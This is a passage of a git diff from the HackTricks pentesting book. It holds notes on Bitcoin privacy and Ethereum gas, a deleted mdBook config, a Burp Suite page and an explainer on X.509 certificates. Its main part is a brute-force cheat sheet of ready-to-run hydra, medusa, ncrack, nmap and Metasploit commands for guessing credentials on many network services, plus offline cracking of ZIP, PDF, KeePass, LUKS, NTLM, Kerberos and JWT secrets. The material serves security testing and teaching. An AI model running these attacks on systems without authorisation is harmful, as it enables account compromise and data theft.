excellent for privacy**, as it breaks change detection heuristics. + +### Multiple change outputs + +If change avoidance is not an option then **creating more than one change output can improve privacy**. This also breaks change detection heuristics which usually assume there is only a single change output. As this method uses more block space than usual, change avoidance is preferable. + +## Monero + +When Monero was developed, the gaping need for **complete anonymity** was what it sought to resolve, and to a large extent, it has filled that void. + +## Ethereum + +### Gas + +Gas refers to the unit that measures the **amount** of **computational** **effort** required to execute specific operations on the Ethereum network. Gas refers to the **fee** required to successfully conduct a **transaction** on Ethereum. + +Gas prices are denoted in **gwei**, which itself is a denomination of ETH - each gwei is equal to **0.000000001 ETH** \(10-9 ETH\). For example, instead of saying that your gas costs 0.000000001 ether, you can say your gas costs 1 gwei. The word 'gwei' itself means 'giga-wei', and it is equal to **1,000,000,000 wei**. Wei itself is the **smallest unit of ETH**. + +To calculate the gas that a transaction is going to cost read this example: + +Let’s say Jordan has to pay Taylor 1 ETH. In the transaction the gas limit is 21,000 units and the base fee is 100 gwei. Jordan includes a tip of 10 gwei. + +Using the formula above we can calculate this as `21,000 * (100 + 10) = 2,310,000 gwei` or 0.00231 ETH. + +When Jordan sends the money, 1.00231 ETH will be deducted from Jordan's account. Taylor will be credited 1.0000 ETH. Miner receives the tip of 0.00021 ETH. Base fee of 0.0021 ETH is burned. + +Additionally, Jordan can also set a max fee \(`maxFeePerGas`\) for the transaction. The difference between the max fee and the actual fee is refunded to Jordan, i.e. `refund = max fee - (base fee + priority fee)`. Jordan can set a maximum amount to pay for the transaction to execute and not worry about overpaying "beyond" the base fee when the transaction is executed. + +As the base fee is calculated by the network based on demand for block space, this last param: maxFeePerGas helps to control the maximum fee that is going to be payed. + +### Transactions + +Notice that in the **Ethereum** network a transaction is performed between 2 addresses and these can be **user or smart contract addresses**. +**Smart Contracts** are stored in the distributed ledger via a **special** **transaction**. + +Transactions, which change the state of the EVM, need to be broadcast to the whole network. Any node can broadcast a request for a transaction to be executed on the EVM; after this happens, a **miner** will **execute** the **transaction** and propagate the resulting state change to the rest of the network. +Transactions require a **fee** and must be mined to become valid. + +A submitted transaction includes the following information: + +* `recipient` – the receiving address \(if an externally-owned account, the transaction will transfer value. If a contract account, the transaction will execute the contract code\) +* `signature` – the identifier of the sender. This is generated when the sender's private key signs the transaction and confirms the sender has authorised this transaction +* `value` – amount of ETH to transfer from sender to recipient \(in WEI, a denomination of ETH\) +* `data` – optional field to include arbitrary data +* `gasLimit` – the maximum amount of gas units that can be consumed by the transaction. Units of gas represent computational steps +* `maxPriorityFeePerGas` - the maximum amount of gas to be included as a tip to the miner +* `maxFeePerGas` - the maximum amount of gas willing to be paid for the transaction \(inclusive of `baseFeePerGas` and `maxPriorityFeePerGas`\) + +Note that there isn't any field for the origin address, this is because this can be extrapolated from the signature. + +## References + +* [https://en.wikipedia.org/wiki/Proof\_of\_stake](https://en.wikipedia.org/wiki/Proof_of_stake) +* [https://www.mycryptopedia.com/public-key-private-key-explained/](https://www.mycryptopedia.com/public-key-private-key-explained/) +* [https://bitcoin.stackexchange.com/questions/3718/what-are-multi-signature-transactions](https://bitcoin.stackexchange.com/questions/3718/what-are-multi-signature-transactions) +* [https://ethereum.org/en/developers/docs/transactions/](https://ethereum.org/en/developers/docs/transactions/) +* [https://ethereum.org/en/developers/docs/gas/](https://ethereum.org/en/developers/docs/gas/) +* [https://en.bitcoin.it/wiki/Privacy](https://en.bitcoin.it/wiki/Privacy#Forced_address_reuse) + + + diff --git a/book.toml b/book.toml deleted file mode 100644 index 66df5354324..00000000000 --- a/book.toml +++ /dev/null @@ -1,39 +0,0 @@ -[book] -authors = ["HackTricks Team"] -language = "en" -src = "src" -title = "HackTricks" - -[build] -create-missing = false -extra-watch-dirs = ["translations"] - -[preprocessor.tabs] - -[preprocessor.hacktricks] -command = "python3 ./hacktricks-preprocessor.py" -env = "prod" - -[output.html] -additional-css = ["theme/tabs.css", "theme/pagetoc.css", "theme/discount.css"] -additional-js = [ - "theme/tabs.js", - "theme/pagetoc.js", - "theme/ht_searcher.js", - "theme/sponsor.js", - "theme/discount.js", - "theme/motion.js", - "theme/ai.js" -] -no-section-label = true -preferred-dark-theme = "hacktricks-dark" -default-theme = "hacktricks-light" -hash-files = false - -[output.html.fold] -enable = true # whether or not to enable section folding -level = 0 # the depth to start folding - - -[output.html.print] -enable = false # whether or not to enable print diff --git a/brute-force.md b/brute-force.md new file mode 100644 index 00000000000..b9d1759f4be --- /dev/null +++ b/brute-force.md @@ -0,0 +1,580 @@ +# Brute Force - CheatSheet + +{% hint style="danger" %} +Do you use **Hacktricks every day**? Did you find the book **very** **useful**? Would you like to **receive extra help** with cybersecurity questions? Would you like to **find more and higher quality content on Hacktricks**? +[**Support Hacktricks through github sponsors**](https://github.com/sponsors/carlospolop) **so we can dedicate more time to it and also get access to the Hacktricks private group where you will get the help you need and much more!** +{% endhint %} + +If you want to know about my **latest modifications**/**additions** or you have **any suggestion for HackTricks** or **PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/)[**telegram group**](https://t.me/peass), or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book and don't forget to **give ⭐** on **github** to **motivate** **me** to continue developing this book. + +## Default Credentials + +**Search in google** for default credentials of the technology that is being used, or **try this links**: + +* [**https://github.com/ihebski/DefaultCreds-cheat-sheet**](https://github.com/ihebski/DefaultCreds-cheat-sheet) +* [**http://www.phenoelit.org/dpl/dpl.html**](http://www.phenoelit.org/dpl/dpl.html) +* [**http://www.vulnerabilityassessment.co.uk/passwordsC.htm**](http://www.vulnerabilityassessment.co.uk/passwordsC.htm) +* [**https://192-168-1-1ip.mobi/default-router-passwords-list/**](https://192-168-1-1ip.mobi/default-router-passwords-list/) +* [**https://datarecovery.com/rd/default-passwords/**](https://datarecovery.com/rd/default-passwords/) +* [**https://bizuns.com/default-passwords-list**](https://bizuns.com/default-passwords-list) +* [**https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/default-passwords.csv**](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/default-passwords.csv) +* [**https://github.com/Dormidera/WordList-Compendium**](https://github.com/Dormidera/WordList-Compendium) +* [**https://www.cirt.net/passwords**](https://www.cirt.net/passwords) +* [**http://www.passwordsdatabase.com/**](http://www.passwordsdatabase.com/) + +## **Create your own Dictionaries** + +Find as much information about the target as you can and generate a custom dictionary. Tools that may help: + +### Crunch + +```bash +crunch 4 6 0123456789ABCDEF -o crunch1.txt #From length 4 to 6 using that alphabet +crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha # Only length 4 using charset mixalpha (inside file charset.lst) + +@ Lower case alpha characters +, Upper case alpha characters +% Numeric characters +^ Special characters including spac +crunch 6 8 -t ,@@^^%% +``` + +### Cewl + +```bash +cewl example.com -m 5 -w words.txt +``` + +### [CUPP](https://github.com/Mebus/cupp) + +Generate passwords based on your knowledge of the victim \(names, dates...\) + +```text +python3 cupp.py -h +``` + +### [pydictor](https://github.com/LandGrey/pydictor) + +### Wordlists + +* [**https://github.com/danielmiessler/SecLists**](https://github.com/danielmiessler/SecLists) +* [**https://github.com/Dormidera/WordList-Compendium**](https://github.com/Dormidera/WordList-Compendium) +* [**https://github.com/kaonashi-passwords/Kaonashi**](https://github.com/kaonashi-passwords/Kaonashi) +* [**https://github.com/google/fuzzing/tree/master/dictionaries**](https://github.com/carlospolop/hacktricks/tree/95b16dc7eb952272459fc877e4c9d0777d746a16/google/fuzzing/tree/master/dictionaries/README.md) +* [**https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm**](https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm) + +## Services + +Ordered alphabetically by service name. + +### AFP + +```bash +nmap -p 548 --script afp-brute +msf> use auxiliary/scanner/afp/afp_login +msf> set BLANK_PASSWORDS true +msf> set USER_AS_PASS true +msf> set PASS_FILE +msf> set USER_FILE +msf> run +``` + +### AJP + +```bash +nmap --script ajp-brute -p 8009 +``` + +### Cassandra + +```bash +nmap --script cassandra-brute -p 9160 +``` + +### CouchDB + +```bash +msf> use auxiliary/scanner/couchdb/couchdb_login +hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 5984 http-get / +``` + +### Docker Registry + +```text +hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst 10.10.10.10 -s 5000 https-get /v2/ +``` + +### Elasticsearch + +```text +hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 9200 http-get / +``` + +### FTP + +```bash +hydra -l root -P passwords.txt [-t 32] ftp +ncrack -p 21 --user root -P passwords.txt [-T 5] +medusa -u root -P 500-worst-passwords.txt -h -M ftp +``` + +### HTTP Generic Brute + +#### [**WFuzz**](pentesting-web/web-tool-wfuzz.md) + +### HTTP Basic Auth + +```bash +hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/ +# Use https-get mode for httpS +medusa -h -u -P -M http -m DIR:/path/to/auth -T 10 +``` + +### HTTP - Post Form + +```bash +hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V +# Use https-post-form mode for httpS +``` + +For http**s** you have to change from "http-post-form" to "**https-post-form"** + +### **HTTP - CMS --** \(W\)ordpress, \(J\)oomla or \(D\)rupal or \(M\)oodle + +```bash +cmsmap -f W/J/D/M -u a -p a https://wordpress.com +``` + +### IMAP + +```bash +hydra -l USERNAME -P /path/to/passwords.txt -f imap -V +hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f imap -V +nmap -sV --script imap-brute -p +``` + +### IRC + +```bash +nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p +``` + +### ISCSI + +```bash +nmap -sV --script iscsi-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 3260 +``` + +### JWT + +```bash +#hashcat +hashcat -m 16500 -a 0 jwt.txt .\wordlists\rockyou.txt + +#https://github.com/Sjord/jwtcrack +python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt + +#John +john jwt.txt --wordlist=wordlists.txt --format=HMAC-SHA256 + +#https://github.com/ticarpi/jwt_tool +python3 jwt_tool.py -d wordlists.txt + +#https://github.com/brendan-rius/c-jwt-cracker +./jwtcrack eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc 1234567890 8 + +#https://github.com/mazen160/jwt-pwn +python3 jwt-cracker.py -jwt eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc -w wordlist.txt + +#https://github.com/lmammino/jwt-cracker +jwt-cracker "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ" "abcdefghijklmnopqrstuwxyz" 6 +``` + +### LDAP + +```bash +nmap --script ldap-brute -p 389 +``` + +### Mongo + +```bash +nmap -sV --script mongodb-brute -n -p 27017 +use auxiliary/scanner/mongodb/mongodb_login +``` + +### MySQL + +```bash +hydra -L usernames.txt -P pass.txt mysql +msf> use auxiliary/scanner/mysql/mysql_login; set VERBOSE false +``` + +### OracleSQL + +```bash +patator oracle_login sid= host= user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017 + +./odat.py passwordguesser -s $SERVER -d $SID +./odat.py passwordguesser -s $MYSERVER -p $PORT --accounts-file accounts_multiple.txt + +#msf1 +msf> use admin/oracle/oracle_login +msf> set RHOSTS +msf> set RPORT 1521 +msf> set SID + +#msf2, this option uses nmap and it fails sometimes for some reason +msf> use scanner/oracle/oracle_login +msf> set RHOSTS +msf> set RPORTS 1521 +msf> set SID + +#nmap fails sometimes for some reson executing this script +nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid= +``` + +In order to use **oracle\_login** with **patator** you need to **install**: + +```bash +pip3 install cx_Oracle --upgrade +``` + +[Offline OracleSQL hash bruteforce](pentesting/1521-1522-1529-pentesting-oracle-listener/remote-stealth-pass-brute-force.md#outer-perimeter-remote-stealth-pass-brute-force) \(**versions 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2,** and **11.2.0.3**\): + +```bash + nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30 +``` + +### POP + +```bash +hydra -l USERNAME -P /path/to/passwords.txt -f pop3 -V +hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f pop3 -V +``` + +### PostgreSQL + +```bash +hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt postgres +medusa -h –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M postgres +ncrack –v –U /root/Desktop/user.txt –P /root/Desktop/pass.txt :5432 +patator pgsql_login host= user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt +use auxiliary/scanner/postgres/postgres_login +nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 +``` + +### PPTP + +You can download the `.deb` package to install from [https://http.kali.org/pool/main/t/thc-pptp-bruter/](https://http.kali.org/pool/main/t/thc-pptp-bruter/) + +```bash +sudo dpkg -i thc-pptp-bruter*.deb #Install the package +cat rockyou.txt | thc-pptp-bruter –u +``` + +### RDP + +```bash +ncrack -vv --user -P pwds.txt rdp:// +hydra -V -f -L -P rdp:// +``` + +### Redis + +```bash +msf> use auxiliary/scanner/redis/redis_login +nmap --script redis-brute -p 6379 +hydra –P /path/pass.txt redis://: # 6379 is the default +``` + +### Rexec + +```bash +hydra -l -P rexec:// -v -V +``` + +### Rlogin + +```bash +hydra -l -P rlogin:// -v -V +``` + +### Rsh + +```bash +hydra -L rsh:// -v -V +``` + +[http://pentestmonkey.net/tools/misc/rsh-grind](http://pentestmonkey.net/tools/misc/rsh-grind) + +### Rsync + +```bash +nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 +``` + +### RTSP + +```bash +hydra -l root -P passwords.txt rtsp +``` + +### SNMP + +```bash +msf> use auxiliary/scanner/snmp/snmp_login +nmap -sU --script snmp-brute [--script-args snmp-brute.communitiesdb= ] +onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt +hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmp +``` + +### SMB + +```bash +nmap --script smb-brute -p 445 +hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1 +``` + +### SMTP + +```bash +hydra -l -P /path/to/passwords.txt smtp -V +hydra -l -P /path/to/passwords.txt -s 587 -S -v -V #Port 587 for SMTP with SSL +``` + +### SOCKS + +```bash +nmap -vvv -sCV --script socks-brute --script-args userdb=users.txt,passdb=/usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt,unpwndb.timelimit=30m -p 1080 +``` + +### SQL Server + +```bash +#Use the NetBIOS name of the machine as domain +crackmapexec mssql -d -u usernames.txt -p passwords.txt +hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt mssql +medusa -h –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M mssql +nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts #Use domain if needed. Be carefull with the number of password in the list, this could block accounts +msf> use auxiliary/scanner/mssql/mssql_login #Be carefull, you can block accounts. If you have a domain set it and use USE_WINDOWS_ATHENT +``` + +### SSH + +```bash +hydra -l root -P passwords.txt [-t 32] ssh +ncrack -p 22 --user root -P passwords.txt [-T 5] +medusa -u root -P 500-worst-passwords.txt -h -M ssh +patator ssh_login host= port=22 user=root 0=/path/passwords.txt password=FILE0 -x ignore:mesg='Authentication failed' +``` + +### Telnet + +```bash +hydra -l root -P passwords.txt [-t 32] telnet +ncrack -p 23 --user root -P passwords.txt [-T 5] +medusa -u root -P 500-worst-passwords.txt -h -M telnet +``` + +### VNC + +```bash +hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt -s vnc +medusa -h –u root -P /root/Desktop/pass.txt –M vnc +ncrack -V --user root -P /root/Desktop/pass.txt :>POR>T +patator vnc_login host= password=FILE0 0=/root/Desktop/pass.txt –t 1 –x retry:fgep!='Authentication failure' --max-retries 0 –x quit:code=0use auxiliary/scanner/vnc/vnc_login +nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 +``` + +### Winrm + +```bash +crackmapexec winrm -d -u usernames.txt -p passwords.txt +``` + +## Local + +### Online cracking databases + +* [~~http://hashtoolkit.com/reverse-hash?~~](http://hashtoolkit.com/reverse-hash?) \(MD5 & SHA1\) +* [https://www.onlinehashcrack.com/](https://www.onlinehashcrack.com/) \(Hashes, WPA2 captures, and archives MSOffice, ZIP, PDF...\) +* [https://crackstation.net/](https://crackstation.net/) \(Hashes\) +* [https://md5decrypt.net/](https://md5decrypt.net/) \(MD5\) +* [https://gpuhash.me/](https://gpuhash.me/) \(Hashes and file hashes\) +* [https://hashes.org/search.php](https://hashes.org/search.php) \(Hashes\) +* [https://www.cmd5.org/](https://www.cmd5.org/) \(Hashes\) +* [https://hashkiller.co.uk/Cracker](https://hashkiller.co.uk/Cracker) \(MD5, NTLM, SHA1, MySQL5, SHA256, SHA512\) +* [https://www.md5online.org/md5-decrypt.html](https://www.md5online.org/md5-decrypt.html) \(MD5\) +* [http://reverse-hash-lookup.online-domain-tools.com/](http://reverse-hash-lookup.online-domain-tools.com/) + +Check this out before trying to bruteforce a Hash. + +### ZIP + +```bash +fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' chall.zip +``` + +```bash +zip2john file.zip > zip.john +john zip.john +``` + +```bash +#$zip2$*0*3*0*a56cb83812be3981ce2a83c581e4bc4f*4d7b*24*9af41ff662c29dfff13229eefad9a9043df07f2550b9ad7dfc7601f1a9e789b5ca402468*694b6ebb6067308bedcd*$/zip2$ +hashcat.exe -m 13600 -a 0 .\hashzip.txt .\wordlists\rockyou.txt +.\hashcat.exe -m 13600 -i -a 0 .\hashzip.txt #Incremental attack +``` + +### 7z + +```bash +cat /usr/share/wordlists/rockyou.txt | 7za t backup.7z +``` + +```bash +#Download and install requirements for 7z2john +wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/7z2john.pl +apt-get install libcompress-raw-lzma-perl +./7z2john.pl file.7z > 7zhash.john +``` + +### PDF + +```bash +apt-get install pdfcrack +pdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txt +#pdf2john didnt worked well, john didnt know which hash type was +# To permanently decrypt the pdf +sudo apt-get install qpdf +qpdf --password= --decrypt encrypted.pdf plaintext.pdf +``` + +### JWT + +```bash +git clone https://github.com/Sjord/jwtcrack.git +cd jwtcrack + +#Bruteforce using crackjwt.py +python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt + +#Bruteforce using john +python jwt2john.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc > jwt.john +john jwt.john #It does not work with Kali-John +``` + +### NTLM cracking + +```bash +Format:USUARIO:ID:HASH_LM:HASH_NT::: +jhon --wordlist=/usr/share/wordlists/rockyou.txt --format=NT file_NTLM.hashes +hashcat -a 0 -m 1000 --username file_NTLM.hashes /usr/share/wordlists/rockyou.txt --potfile-path salida_NT.pot +``` + +### Keepass + +```bash +sudo apt-get install -y kpcli #Install keepass tools like keepass2john +keepass2john file.kdbx > hash #The keepass is only using password +keepass2john -k file.kdbx > hash # The keepas is also using a file as a needed credential +#The keepass can use password and/or a file as credentials, if it is using both you need to provide them to keepass2john +john --wordlist=/usr/share/wordlists/rockyou.txt hash +``` + +### Keberoasting + +```bash +john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast +hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt +./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi +``` + +### Lucks image + +#### Method 1 + +Install: [https://github.com/glv2/bruteforce-luks](https://github.com/glv2/bruteforce-luks) + +```bash +bruteforce-luks -f ./list.txt ./backup.img +cryptsetup luksOpen backup.img mylucksopen +ls /dev/mapper/ #You should find here the image mylucksopen +mount /dev/mapper/mylucksopen /mnt +``` + +#### Method 2 + +```bash +cryptsetup luksDump backup.img #Check that the payload offset is set to 4096 +dd if=backup.img of=luckshash bs=512 count=4097 #Payload offset +1 +hashcat -m 14600 -a 0 luckshash wordlists/rockyou.txt +cryptsetup luksOpen backup.img mylucksopen +ls /dev/mapper/ #You should find here the image mylucksopen +mount /dev/mapper/mylucksopen /mnt +``` + +### Mysql + +```bash +#John hash format +:$mysqlna$* +dbuser:$mysqlna$112233445566778899aabbccddeeff1122334455*73def07da6fba5dcc1b19c918dbd998e0d1f3f9d +``` + +## Tools + +**Hash examples:** [https://openwall.info/wiki/john/sample-hashes](https://openwall.info/wiki/john/sample-hashes) + +### Hash-identifier + +```bash +hash-identifier +> +``` + +### John mutation + +Read _**/etc/john/john.conf**_ and configure it + +```bash +john --wordlist=words.txt --rules --stdout > w_mutated.txt +john --wordlist=words.txt --rules=all --stdout > w_mutated.txt #Apply all rules +``` + +### Hashcat + +```bash +hashcat --example-hashes | grep -B1 -A2 "NTLM" +``` + +Cracking Linux Hashes - /etc/shadow file + +```text + 500 | md5crypt $1$, MD5(Unix) | Operating-Systems +3200 | bcrypt $2*$, Blowfish(Unix) | Operating-Systems +7400 | sha256crypt $5$, SHA256(Unix) | Operating-Systems +1800 | sha512crypt $6$, SHA512(Unix) | Operating-Systems +``` + +Cracking Windows Hashes + +```text +3000 | LM | Operating-Systems +1000 | NTLM | Operating-Systems +``` + +Cracking Common Application Hashes + +```text + 900 | MD4 | Raw Hash + 0 | MD5 | Raw Hash + 5100 | Half MD5 | Raw Hash + 100 | SHA1 | Raw Hash +10800 | SHA-384 | Raw Hash + 1400 | SHA-256 | Raw Hash + 1700 | SHA-512 | Raw Hash +``` + diff --git a/burp-suite.md b/burp-suite.md new file mode 100644 index 00000000000..465ae3dcab9 --- /dev/null +++ b/burp-suite.md @@ -0,0 +1,16 @@ +# Burp Suite + +## Basic Payloads + +* **Simple List:** Just a list containing an entry in each line +* **Runtime File:** A list read in runtime \(not loaded in memory\). For supporting big lists. +* **Case Modification:** Apply some changes to a list of strings\(No change, to lower, to UPPER, to Proper name - First capitalized and the rest to lower-, to Proper Name -First capitalized an the rest remains the same-. +* **Numbers:** Generate numbers from X to Y using Z step or randomly. +* **Brute Forcer:** Character set, min & max length. + +[https://github.com/0xC01DF00D/Collabfiltrator](https://github.com/0xC01DF00D/Collabfiltrator) : Payload to execute commands and grab the output via DNS requests to burpcollab. + +{% embed url="https://medium.com/@ArtsSEC/burp-suite-exporter-462531be24e" %} + +[https://github.com/h3xstream/http-script-generator](https://github.com/h3xstream/http-script-generator) + diff --git a/certificates.md b/certificates.md new file mode 100644 index 00000000000..82d8a25cab3 --- /dev/null +++ b/certificates.md @@ -0,0 +1,58 @@ +# Certificates + +## What is a Certificate + +In cryptography, a **public key certificate,** also known as a **digital certificate** or **identity certificate,** is an electronic document used to prove the ownership of a public key. The certificate includes information about the key, information about the identity of its owner \(called the subject\), and the digital signature of an entity that has verified the certificate's contents \(called the issuer\). If the signature is valid, and the software examining the certificate trusts the issuer, then it can use that key to communicate securely with the certificate's subject. + +In a typical [public-key infrastructure](https://en.wikipedia.org/wiki/Public-key_infrastructure) \(PKI\) scheme, the certificate issuer is a [certificate authority](https://en.wikipedia.org/wiki/Certificate_authority) \(CA\), usually a company that charges customers to issue certificates for them. By contrast, in a [web of trust](https://en.wikipedia.org/wiki/Web_of_trust) scheme, individuals sign each other's keys directly, in a format that performs a similar function to a public key certificate. + +The most common format for public key certificates is defined by [X.509](https://en.wikipedia.org/wiki/X.509). Because X.509 is very general, the format is further constrained by profiles defined for certain use cases, such as [Public Key Infrastructure \(X.509\)](https://en.wikipedia.org/wiki/PKIX) as defined in RFC 5280. + +## x509 Common Fields + +* **Version Number:** Version of x509 format. +* **Serial Number**: Used to uniquely identify the certificate within a CA's systems. In particular this is used to track revocation information. +* **Subject**: The entity a certificate belongs to: a machine, an individual, or an organization. + * **Common Name**: Domains affected by the certificate. Can be 1 or more and can contain wildcards. + * **Country \(C\)**: Country + * **Distinguished name \(DN\)**: The whole subject: `C=US, ST=California, L=San Francisco, O=Example, Inc., CN=shared.global.example.net` + * **Locality \(L\)**: Local place + * **Organization \(O\)**: Organization name + * **Organizational Unit \(OU\)**: Division of an organisation \(like "Human Resources"\). + * **State or Province \(ST, S or P\)**: List of state or province names +* **Issuer**: The entity that verified the information and signed the certificate. + * **Common Name \(CN\)**: Name of the certificate authority + * **Country \(C\)**: Country of the certificate authority + * **Distinguished name \(DN\)**: Distinguished name of the certificate authority + * **Locality \(L\)**: Local place where the organisation can be found. + * **Organization \(O\)**: Organisation name + * **Organizational Unit \(OU\)**: Division of an organisation \(like "Human Resources"\). +* **Not Before**: The earliest time and date on which the certificate is valid. Usually set to a few hours or days prior to the moment the certificate was issued, to avoid [clock skew](https://en.wikipedia.org/wiki/Clock_skew#On_a_network) problems. +* **Not After**: The time and date past which the certificate is no longer valid. +* **Public Key**: A public key belonging to the certificate subject. \(This is one of the main parts as this is what is signed by the CA\) + * **Public Key Algorithm**: Algorithm used to generate the public key. Like RSA. + * **Public Key Curve**: The curve used by the elliptic curve public key algorithm \(if apply\). Like nistp521. + * **Public Key Exponent**: Exponent used to derive the public key \(if apply\). Like 65537. + * **Public Key Size**: The size of the public key space in bits. Like 2048. + * **Signature Algorithm**: The algorithm used to sign the public key certificate. + * **Signature**: A signature of the certificate body by the issuer's private key. +* **x509v3 extensions** + * **Key Usage**: The valid cryptographic uses of the certificate's public key. Common values include digital signature validation, key encipherment, and certificate signing. + * In a Web certificate this will appear as a _X509v3 extension_ and will have the value `Digital Signature` + * **Extended Key Usage**: The applications in which the certificate may be used. Common values include TLS server authentication, email protection, and code signing. + * In a Web certificate this will appear as a _X509v3 extension_ and will have the value `TLS Web Server Authentication` + * **Subject Alternative Name:** Allows users to specify additional host **names** for a single SSL **certificate**. The use of the SAN extension is standard practice for SSL certificates, and it's on its way to replacing the use of the common **name**. + * **Basic Constraint:** This extension describes whether the certificate is a CA certificate or an end entity certificate. A CA certificate is something that signs certificates of others and a end entity certificate is the certificate used in a web page for example \(the last par of the chain\). + * **Subject Key Identifier** \(SKI\): This extension declares a unique **identifier** for the public **key** in the certificate. It is required on all CA certificates. CAs propagate their own SKI to the Issuer **Key Identifier** \(AKI\) extension on issued certificates. It's the hash of the subject public key. + * **Authority Key Identifier**: It contains a key identifier which is derived from the public key in the issuer certificate. It's the hash of the issuer public key. + * **Authority Information Access** \(AIA\): This extension contains at most two types of information : + * Information about **how to get the issuer of this certificate** \(CA issuer access method\) + * Address of the **OCSP responder from where revocation of this certificate** can be checked \(OCSP access method\). + * **CRL Distribution Points**: This extension identifies the location of the CRL from which the revocation of this certificate can be checked. The application that processes the certificate can get the location of the CRL from this extension, download the CRL and then check the revocation of this certificate. + +### Difference between OSCP and CRL Distribution Points + +**OCSP** \(RFC 2560\) is a standard protocol that consists of an **OCSP client and an OCSP responder**. This protocol **determines revocation status of a given digital public-key certificate** **without** having to **download** the **entire CRL**. +**CRL** is the **traditional method** of checking certificate validity. A **CRL provides a list of certificate serial numbers** that have been revoked or are no longer valid. CRLs let the verifier check the revocation status of the presented certificate while verifying it. CRLs are limited to 512 entries. +From [here](https://www.arubanetworks.com/techdocs/ArubaOS%206_3_1_Web_Help/Content/ArubaFrameStyles/CertRevocation/About_OCSP_and_CRL.htm#:~:text=OCSP%20%28RFC%202560%29%20is%20a,to%20download%20the%20entire%20CRL.&text=A%20CRL%20provides%20a%20list,or%20are%20no%20longer%20valid.). + diff --git a/clean_unused_images.sh b/clean_unused_images.sh deleted file mode 100644 index 